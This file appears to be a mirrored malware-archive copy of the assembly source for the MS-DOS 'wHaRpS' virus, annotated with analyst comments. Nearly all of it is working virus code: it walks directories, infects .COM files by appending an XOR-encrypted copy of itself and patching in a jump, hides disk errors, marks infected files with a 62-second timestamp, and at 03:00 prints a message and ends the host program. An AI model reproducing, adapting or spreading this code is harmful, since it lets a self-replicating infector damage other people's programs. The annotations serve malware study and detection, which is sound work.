mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 18:02:48 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Wharps.asm
vxunderground 8c9f96fc5f mov fix
2022-08-21 04:30:30 -05:00


; "One must crawl before one walks."
; wHaRpS Virus 1.0
; wHaRpS virus of independent virus writer FirstStrike
; For use by [Phalcon\Skism] ONLY!
; Special thanx to:
; Gheap
; Dark Angel
; Demogorgon
; Assembler set-up and scratch-area layout (MASM/TASM-style directives).
; The image is a .COM program: one segment, code assembled at offset 100h.
; Every equate below except olddta is a fixed offset near the top of that
; same 64K segment, used as scratch storage at run time. Nothing in this
; listing reserves or initialises that memory.
name wHaRpS
title
code segment
assume cs:code,ds:code
org 100h
; 16h / 1Ah / 1Eh are the time, size and name fields of the DOS
; find-first/find-next record that DOS writes into the DTA.
dta equ 65000d ; DTA address to be set
fname equ 65000d + 1eh ; DTA - file name
ftime equ 65000d + 16h ; DTA - file time
fsize equ 65000d + 1ah ; DTA - file size
orgdir equ 65400d ; original path storage
date equ 65300d ; store file date
time equ 65302d ; store file time
attrib equ 65304d ; store file attrib
; err1 receives BX and err2 receives ES from INT 21h AX=3524h (see errorh),
; i.e. the offset and segment of the previous INT 24h handler.
err1 equ 65306d ; old error handler address
err2 equ 65308d ; old error handler address
olddta equ 80h ; original DTA address
; begin - entry point of the body.
; call/pop leaves the run-time address of `setup` in BP; subtracting the
; assembly-time offset gives the displacement ("delta") between where the
; code was assembled and where it is actually running. Every later
; [bp+label] operand depends on BP keeping this value.
begin:
nop
nop
nop
call setup ; find "delta offset"
setup:
pop bp
sub bp, offset setup
; As assembled, both jumps below transfer straight to main, so crypt_em is
; not executed on this path.
; NOTE(review): the meaning of the original "DEBUG E8 02 00" remark is not
; established by anything else in this listing.
jmp main ; DEBUG E8 02 00
nop
jmp main
; crypt_em - XOR every byte from main up to (not including) end_crypt, in
; place, with a one-byte key.
; In:    BP = delta offset.
;        lodsb reads DS:SI and stosb writes ES:DI, so DS and ES are assumed
;        to address this segment - TODO confirm for every caller.
; Out:   region transformed; XOR is its own inverse, so the same routine
;        serves for both directions.
; Clobb: AL, CX, SI, DI, flags.
; Analyst note: this routine, the entry stub before it and the code after
; end_crypt all lie outside the transformed range, so those bytes are the
; same in every copy apart from the key byte at encrypt_val.
crypt_em:
xor di,di                       ; redundant: DI is overwritten two lines down
lea si, [bp+main]
mov di, si                      ; source == destination (in-place)
mov cx, end_crypt - main        ; byte count of the range
xor_loop:
lodsb ; ds:[si] -> al
; 34h is the opcode of "xor al, imm8"; the byte labelled encrypt_val that
; follows is its immediate operand. crypt_change overwrites that byte at run
; time, so the key is stored inside the instruction itself.
db 34h ; xor al, XX
encrypt_val db 0 ; Starting encryption value is 0
stosb ; al ->es:[di]
loop xor_loop
ret
; main - copy the three bytes held in saveins to offset 0100h, the start of
; the .COM image in memory. saveins is filled by the read in `infect` with
; the first three bytes of a file before those bytes are overwritten on disk.
; rep movsb copies DS:SI -> ES:DI; ES is assumed to equal this segment
; (not set anywhere in this listing - TODO confirm).
main:
xor di,di                       ; redundant: next instruction loads DI
mov di,0100h ; Restore first three
lea si,[bp+saveins] ; original program bytes
mov cx,0003d
rep movsb
jmp system_pic ; Take a "picture" of system settings
; handler - replacement INT 24h (DOS critical-error) handler, installed by
; errorh. It returns AL=0, the "ignore" action code, so a failing disk
; operation (for example a write to a protected diskette) does not bring up
; the Abort/Retry/Fail prompt while this code is running.
handler: ; error handler
mov al,0
iret
; NOTE(review): stray endp - no matching proc appears in this listing.
endp
; Data area. It sits between main and end_crypt, so it is inside the range
; that crypt_em XORs. These strings are therefore readable as plain text
; only in a copy whose range has not been XORed (or was XORed with key 0);
; they are not dependable string signatures on their own.
data label byte
wharps db '[wHaRpS]',0 ; wHaRpS ID
; NOTE(review): the non-ASCII bytes of the next string were damaged when
; this page was extracted; the literal is left exactly as found.
author db 'F<>rs<72>Str<74>k<EFBFBD>',0 ; Me
; '*.' matches names that have no extension (used for the directory scan).
dir_mask db '*.',0 ; dir atrib
allcom db '*.COM',0 ; what to search for
root db '\',0 ; root
; Filled by the 3-byte read in `infect`; the initial value E8 00 00 is what
; main copies to 0100h when this listing is run as assembled.
saveins db 0e8h,00h,00h ; original three bytes
; ultimate = ordinal of the root entry to enter on this pass;
; current  = ordinal of the entry the scan has reached so far.
ultimate dw 0 ; ultimate dir to be reached
current dw 0 ; current dir
; '$'-terminated, as required by INT 21h AH=09h (see bomb).
message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $'
; system_pic - record the current directory of the default drive (DL=0) in
; the orgdir scratch buffer via INT 21h AH=47h.
system_pic: ; SNAP!
mov ah,47h ; get original path
mov dl,0
lea si,cs:orgdir ; store original path
int 21h
; crypt_change - read the clock (INT 21h AH=2Ch: CH=hour, CL=minute,
; DH=second, DL=hundredths) and
;   1. store DL as the XOR key inside crypt_em (the encrypt_val byte), so
;      the key is one of at most 100 values and changes between runs;
;   2. test for the trigger time: hour == 3 and minute == 0.
; Outside that one-minute window control goes to errorh.
crypt_change: ; set crypt value
mov ah,2ch
int 21h
mov [bp+encrypt_val],dl
cmp ch,03                       ; hour == 03 ?
jz more
jmp errorh
more:
cmp cl,00                       ; minute == 00 ?
jz bomb
jmp errorh
; bomb - payload for the 03:00 window: print `message` with AH=09h and
; terminate the process with AH=4Ch. The program that was launched never
; gets control on this path.
bomb:
mov ah,09h
lea dx,[bp+message]
int 21h
mov ah,4ch
int 21h
; errorh - replace the INT 24h (critical error) vector.
; AX=3524h returns the current vector in ES:BX; BX is written to err1 and ES
; to err2. ES is pushed/popped around the call because later string
; instructions (stosb, rep movsb) depend on it.
; AX=2524h then installs DS:DX = `handler`.
; Analyst note: a process that repoints INT 24h at a stub that always
; answers "ignore" just before scanning directories is a behavioural
; indicator in its own right.
errorh:
push es ; save original error handler address
mov ax,3524h
int 21h
mov word ptr cs:err1,bx
mov word ptr cs:err2,es
pop es
mov ax,2524h ; set an error handler
lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals
int 21h
jmp pre_search
; drop_to_root / set_path - two entry points into one INT 21h AH=3Bh
; (change directory) call.
;   drop_to_root: DX -> the '\' string (root of the current drive)
;   set_path:     DX -> name field of the DTA (the entry just found)
; The carry flag returned by DOS is not examined here or by the callers in
; this listing, so a failed change of directory goes unnoticed.
drop_to_root: ; subroutine to visit the root
lea dx,[bp+root]
jmp continue
set_path: ; OR set a path
lea dx,cs:fname
continue:
mov ah,3bh
int 21h
ret
; return_to_search - taken when the directory just visited has no (more)
; .COM matches: advance the target ordinal, go back to the root and restart
; the entry count.
return_to_search:
inc [bp+ultimate]
call drop_to_root
mov [bp+current],0000
jmp find_first_dir
; pre_search - point the DTA at the scratch offset `dta` (INT 21h AH=1Ah),
; reset both counters, select the first root entry (ultimate = 1) and change
; to the root directory. Falls through into find_first_dir.
pre_search: ; set a DTA
mov dx,dta
mov ah,1ah
int 21h
mov [bp+current],0000 ; zero the counters
mov [bp+ultimate],0000 ; ""
inc [bp+ultimate] ; want to search 1st dir in root
call drop_to_root ; bomb to root
; find_first_dir / dir_test / find_next_dir - walk the entries of the current
; directory (the root, as set by the callers) that match '*.' with attribute
; mask 16 (10h, directory), counting each match in `current`. When the count
; equals `ultimate` the entry's name is passed to set_path and the .COM scan
; starts there. When DOS reports no further match (carry set) control goes
; to almost_done.
; NOTE(review): the attribute mask on find-first is inclusive, so
; extension-less ordinary files presumably match and are counted too -
; confirm against DOS documentation.
find_first_dir: ; directory searchin'
lea dx,[bp+dir_mask]
mov cx,16
mov ah,4Eh
int 21h
jc almost_done ; no directories?
dir_test:
inc [bp+current] ; directory found - MARK!
mov bx,[bp+current]
cmp word ptr [bp+ultimate],bx ; is it the one we want?
jnz find_next_dir ; no, find another
call set_path ; yes, set the correct path
jmp find_first_file ; find some .COMs
find_next_dir: ; mo' directory searchin'
mov ah,4fh
int 21h
jc almost_done
jmp dir_test ; go see if correct dir found yet
; find_first_file / find_next_file - enumerate '*.COM' in the current
; directory; CX=1 lets read-only files match as well. No match (carry set)
; sends control back to return_to_search.
find_first_file: ; file searchin'
lea dx,[bp+allcom]
mov cx,00000001b
mov ah,4Eh
int 21h
jc return_to_search ; no .COM so mo' dir
jmp check_if_ill ; is the file "sick"?
find_next_file: ; keep on a searchin'
mov ah,4fh
int 21h
jc return_to_search ; no more .COM so back
; to the directories
; check_if_ill - candidate filter, applied to the DTA record of the match:
;   * low 5 bits of the time word (seconds / 2) == 31, i.e. a displayed
;     time of ":62" seconds -> treated as already modified, skipped;
;   * size above 60000 or below 500 bytes -> skipped (unsigned compares).
; Analyst note: the same seconds value is written back by attrib_stuff, so
; .COM files whose timestamp carries the impossible seconds value 62 are a
; quick triage indicator for this family.
; NOTE(review): the two size compares give no operand size; presumably the
; assembler takes them as word compares on the low word of the size field.
check_if_ill: ; check file's health
mov ax,cs:ftime
and al,11111b ; good, your sick!
cmp al,62d/2 ; (No more 62 seconds as virus
jz find_next_file ; markers! - I swear!)
cmp cs:fsize,60000d ; whoa, file to big!
ja find_next_file ; so, get a new one
cmp cs:fsize,500d ; whoa, file to small!
jb find_next_file ; throw it back and move on
jmp infect ; perfect, for infection
; Data placed after an unconditional jmp: never executed.
db 'Joy J.',0 ; don't ask
; error / pre_done / almost_done - three names for one trampoline to `done`,
; the common clean-up and exit path. `error` is not referenced anywhere in
; this listing.
error:
pre_done:
almost_done:
jmp done ; in case of emergency.....
; infect - modify the one file selected by check_if_ill, then fall through
; to `done`; at most one file is changed per run.
; Observable sequence on the target (all INT 21h):
;   4300h  read attributes            -> saved in attrib
;   4301h  write attributes with bit 0 (read-only) cleared
;   3D02h  open read/write            -> handle moved to BX
;   5700h  read date/time             -> saved in date / time
;   3Fh    read first 3 bytes         -> saveins
;   4202h  seek to end                -> AX = low word of file length
;   40h    append endcode-begin bytes starting at `begin`
;   4200h  seek to start, 40h write 3 bytes: E9 + new_jmp
;   5701h  write date/time back with seconds field forced to 31
;   3Eh    close, 4301h restore the saved attributes
; Any carry after a call jumps to the exit path. For failures after the
; open this means the handle is not closed and the attributes are not
; restored, which can leave the read-only bit cleared on a file whose
; contents were not changed.
; The `mov` instructions placed between an int 21h and its jc do not alter
; flags, so each jc still tests the carry returned by DOS.
infect:
mov ah,43h ; save original attribute
mov al,00h
lea dx,cs:[fname]
int 21h
mov cs:attrib,cx
jc pre_done
mov ax,4301h ; clear all attributes
; The 8-bit literal means bits 8-15 of CX are cleared along with bit 0.
and cx,11111110b ; (none shall slow progress)
int 21h
jc pre_done
mov ax,3d02h ; open the file, please
int 21h
jc pre_done
xchg bx,ax                      ; BX = file handle for all calls below
mov ax,5700h ; save the date/time
int 21h
mov cs:time,cx
mov cs:date,dx
jc pre_done
mov ah,3Fh ; read first 3 bytes of file
mov cx,0003h ; to be infected and save
lea dx,[bp+saveins]
int 21h
jc pre_done
mov ax,4202h ; move to end of file
xor cx,cx
xor dx,dx
int 21h
jc pre_done
; The file length is stored unadjusted as the rel16 of the E9 jump written
; at file offset 0. A near jump is relative to the following instruction
; (offset 3), so the target is 3 bytes into the appended copy, just past
; the three nops at `begin`.
mov [bp+new_jmp],ax
; XORs main..end_crypt in memory, a range that contains this routine up to
; this call. Execution resumes at end_crypt, which is outside the range;
; the in-memory range stays transformed for the rest of the run.
call crypt_em
end_crypt label byte ; encrypt to here
mov ah,40h
mov cx,endcode-begin
lea dx,[bp+begin]
int 21h ; encrypt n' write virus to end of
jc done ; file
mov ax,4200h ; go to beginning of file
xor cx,cx
xor dx,dx
int 21h
jc done
jmp cont
; 3-byte near-jump template written over the start of the target file;
; kept after end_crypt so it is written out untransformed.
jmpc db 0e9h
new_jmp dw ?
cont:
mov ah,40h
mov cl,3                        ; CH is still 0 from the xor cx,cx above
lea dx,[bp+jmpc]
int 21h
jc done
attrib_stuff:
mov ax,5701h
mov cx,cs:[time]
mov dx,cs:[date]
or cl,11111b                    ; seconds field = 31 (the ":62" marker)
int 21h
jc done
mov ah,3eh
int 21h
jc done
mov ax,4301h
mov cx,cs:[attrib]
lea dx,cs:[fname]
int 21h
jc done
; done - common exit path: reset the DTA to PSP:80h, write the INT 24h
; vector again, change directory, then jump to offset 0100h so the program
; whose first bytes main put back gets control.
done:
mov dx,olddta ; restore all changes
mov ah,1ah
int 21h
push ds
mov ax,2524h
; NOTE(review): lea yields the offsets of err2 / err1, not the words errorh
; stored there, so the vector written here is built from those two
; constants rather than from the saved ES:BX.
lea dx,cs:[err2]
mov ds,dx
lea dx,cs:[err1]
int 21h
pop ds
mov ah,3bh
; NOTE(review): DX receives the character code of '/', which AH=3Bh then
; uses as the offset of a path string; what lies at that offset is not
; shown in this listing. The carry result is not checked.
mov dx,'/'
int 21h
mov ah,3bh
lea dx,cs:[orgdir]              ; path captured by system_pic
int 21h
xor di,di                       ; redundant: next instruction loads DI
mov di,0100h
jmp di ; good_bye
; endcode marks the end of the bytes written by the append in `infect`
; (count = endcode-begin).
endcode label byte
code ends
end begin